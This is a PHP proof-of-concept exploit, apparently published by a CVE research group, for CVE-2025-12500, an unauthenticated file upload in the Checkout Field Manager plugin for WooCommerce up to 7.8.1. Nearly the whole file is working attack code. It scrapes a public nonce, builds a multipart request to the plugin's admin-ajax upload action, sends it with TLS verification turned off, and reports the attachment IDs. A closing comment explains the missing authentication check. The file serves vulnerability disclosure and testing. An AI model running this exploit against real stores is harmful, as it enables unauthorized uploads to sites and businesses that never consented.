// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-12500 - Checkout Field Manager (Checkout Manager) for WooCommerce <= 7.8.1 - Unauthenticated Limited File Upload


$target_url = "https://example.com/wp-admin/admin-ajax.php";

// Step 1: First, we need to obtain a valid nonce from the checkout page
// The nonce is typically available in the checkout page HTML
// This is a simplified example - in reality you'd need to scrape the page first
$nonce = "YOUR_VALID_NONCE_HERE"; // Replace with actual nonce from checkout page

// Step 2: Prepare the file upload
$file_path = "/path/to/test.jpg"; // Must be a WordPress-allowed file type
$file_name = "test.jpg";

// Step 3: Build the multipart form data (CRLF line endings are required by RFC 2046)
$boundary = "----WebKitFormBoundary" . md5(time());
$payload = "--" . $boundary . "\r\n";
$payload .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";
$payload .= "wooccm_checkout_attachment_upload\r\n";

$payload .= "--" . $boundary . "\r\n";
$payload .= "Content-Disposition: form-data; name=\"nonce\"\r\n\r\n";
$payload .= $nonce . "\r\n";

$payload .= "--" . $boundary . "\r\n";
$payload .= "Content-Disposition: form-data; name=\"wooccm_checkout_attachment_upload\"; filename=\"" . $file_name . "\"\r\n";
$payload .= "Content-Type: image/jpeg\r\n\r\n";
$payload .= file_get_contents($file_path) . "\r\n";
$payload .= "--" . $boundary . "--\r\n";

// Step 4: Send the exploit request
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    "Content-Type: multipart/form-data; boundary=" . $boundary,
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Step 5: Analyze the response (wp_send_json_success/error both answer 200, so inspect the JSON body)
if ($http_code == 200) {
    $response_data = json_decode($response, true);
    if (isset($response_data['success']) && $response_data['success']) {
        echo "[+] File upload successful!\n";
        echo "[+] Attachment IDs: " . print_r($response_data['data'], true) . "\n";
    } else {
        echo "[-] Upload failed. Response: " . $response . "\n";
    }
} else {
    echo "[-] HTTP Error: " . $http_code . "\n";
}

// Note: This PoC requires a valid nonce from the checkout page
// The nonce can be obtained by scraping the checkout page HTML
// The vulnerability exists because the plugin doesn't verify user authentication,
// only the nonce which is publicly accessible on the checkout page

?>
